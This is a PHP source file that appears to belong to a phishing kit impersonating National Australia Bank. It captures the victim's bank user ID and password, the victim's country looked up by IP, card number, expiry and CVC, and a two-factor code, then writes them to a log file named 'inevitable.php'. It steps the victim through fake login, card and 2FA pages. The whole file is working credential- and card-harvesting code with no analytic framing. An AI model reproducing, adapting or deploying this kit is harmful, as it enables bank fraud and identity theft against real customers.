<?php
$domain="www.nab.com.au";
$enil=substr(md5(time()), 7, 21);

if( isset($_POST['userid']) )
{
    
$inputu = $_POST['userid']; 
$inputp = $_POST['password'];


$ipj = "https://get.geojs.io/v1/ip/country/".$ip;
$ipj1 = @file_get_contents($ipj, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$ipj1=str_replace(array("\r", "\n"), '', $ipj1);

$data = "
$user|https://$domain|$inputu:$inputp|$ipj1|nzcc|af2x|";

    $file=fopen("inevitable.php","a");
    fwrite($file,$data);
    fclose($file);

}
if( isset($_POST['cczn']) ){

$enil = $_GET['user'];
$cczn=$_POST['cczn'];
$expzn=$_POST['expzn'];
$cvczn=$_POST['cvczn'];
$nzc='nzcc';
$nzcc = $cczn.'|'.$expzn.'|'.$cvczn.'|nzcc';
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($nzc,$nzcc,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
}}
}
if( isset($_POST['2fa']) ){

$enil = $_GET['user'];
$gauth=$_POST['2fa'];
$af2x = 'af2x';
$x2fa = $gauth.'|x2fa';
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($af2x,$x2fa,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
}}
}
?>

<?php if ($step == 'login'): ?>
<?php include"nab/de_login.php";?>
<?php endif; ?>

<?php  if ($step == 'loadingl'): ?>
<?php include"nab/de_loading.php";?>
<?php endif; ?>

<?php  if ($step == 'cc'): ?>
<?php include"nab/de_cc.php";?>
<?php endif; ?>

<?php  if ($step == 'loadingc'): ?>
 <?php include"nab/de_loadingc.php";?>
<?php endif; ?>

<?php  if ($step == '2fa'): ?>
<?php include"nab/de_2fa.php";?>
<?php endif; ?>
</html>